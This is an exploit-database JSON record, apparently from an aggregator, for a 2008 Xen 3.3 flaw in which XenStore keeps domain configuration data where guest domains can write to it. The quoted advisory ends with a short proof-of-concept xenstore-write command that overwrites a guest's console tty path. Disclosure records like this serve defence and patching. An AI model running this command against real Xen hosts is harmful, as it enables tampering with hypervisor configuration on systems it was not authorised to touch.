Description
Xen 3.3 - XenStore Domain Configuration Data Unsafe Storage
{"lastseen": "2020-04-01T19:05:28", "references": [], "description": "\nXen 3.3 - XenStore Domain Configuration Data Unsafe Storage", "edition": 1, "reporter": "Pascal Bouchareine", "exploitpack": {"type": "local", "platform": "linux"}, "published": "2008-09-30T00:00:00", "title": "Xen 3.3 - XenStore Domain Configuration Data Unsafe Storage", "type": "exploitpack", "enchantments": {"dependencies": {}, "score": {"value": -0.7, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.7}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2008-09-30T00:00:00", "id": "EXPLOITPACK:A75FD583A9AB7BDEE357FDE5DCF650DA", "href": "", "viewCount": 2, "sourceData": "source: https://www.securityfocus.com/bid/31499/info\n\nXen is prone to a vulnerability that results in configuration information being stored in a location that is writable by guest domains.\n\nUPDATE (December 19, 2008): The initial proposed patches did not resolve this issue.\n\nXen 3.3 is vulnerable; other versions may also be affected. \n\n#yum install xen\n# xenstore-write /local/domain/GUEST-DOMID/console/tty /i/am/the/evil/guest", "cvss": {"score": 0.0, "vector": "NONE"}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645704867, "score": 1659814272}, "_internal": {"score_hash": "5d4699262c8777902fa26d5d7ca49087"}}
{}